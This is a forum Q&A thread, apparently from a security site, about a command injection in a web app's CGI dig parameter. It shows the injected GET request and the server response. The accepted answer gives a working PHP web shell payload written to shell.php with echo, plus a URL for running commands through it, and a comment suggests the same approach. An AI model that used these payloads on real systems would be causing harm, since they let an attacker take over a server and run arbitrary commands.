4

While testing a web application today, I came across a function that passed arguments to dig in linux terminal. After some fiddling about I was able to pass the echo command using pipes and echo my input to the response however I failed to launch any other commands.

Now my question is that is it possible to use the echo command in a malicious way to access sensitive files on the system or gain a shell?

Here is the vulnerable GET request:

GET /cgi-mod/test.cgi?dig_device=8.8.8.8"|echo%20abc123%20|| HTTP/1.1
Host: test.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

And here is the response:

HTTP/1.1 200 OK
Server: TestServer
Date: Mon, 02 May 2016 11:03:40 GMT
Content-Type: text/html
Connection: close
Status: 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 1576

<html><head><meta charset="utf-8" /><title></title></head><body><pre><!--                                                          
; &lt;&lt;&gt;&gt; DiG 9.4.1-P1 &lt;&lt;&gt;&gt; abc123
;; global options:  printcmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 32623
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;abc123.                IN  A

;; ANSWER SECTION:
abc123.         10  IN  A   104.239.213.7
abc123.         10  IN  A   198.105.254.11

;; Query time: 69 msec
;; SERVER: 4.2.2.1#53(4.2.2.1)
;; WHEN: Mon May  2 04:03:41 2016
;; MSG SIZE  rcvd: 56
Mico
  • 387
  • 4
  • 17
  • 1
    Instead of `echo` did you try and succeed with any any other commands? My point was is it only `echo` thats possible? – Sravan May 02 '16 at 10:56
  • Yeah I tried other commands but so far only echo worked. – Mico May 02 '16 at 10:57
  • 1
    can you paste the sample you injected? Also, if available the code line where dig command was constructed/executed like `dig example.com any` – Sravan May 02 '16 at 11:00
  • 1
    You can use echo to write your output to a file. Something like `echo '' > shell.php` ? – Mukarram Khalid May 02 '16 at 11:06
  • Added the GET request and response. – Mico May 02 '16 at 11:06
  • 2
    @Mico I think that `echo` is not being executed on server. It may be sanitising to `abc123` before executing `dig`. Try this once and check the output `GET /cgi-mod/test.cgi?dig_device=8.8.8.8"|nonexistcommand%20abc123%20|| HTTP/1.1` – Sravan May 02 '16 at 11:21

1 Answers1

6

Yes. You can use echo maliciously. You can use > operator to redirect the output to a file where the output can be a malicious code.

echo 'Malicious_code_here' > shell.php

Lets consider a case where the webserver supports PHP and the www directory is writable. you can try something like:

echo '<?php system($_GET["cmd"]);?>' > shell.php

And you can access the shell by:

http://url_of_the_website/shell.php?cmd=whoami

Using this, you can execute arbitrary commands on the webserver.

Mukarram Khalid
  • 294
  • 1
  • 5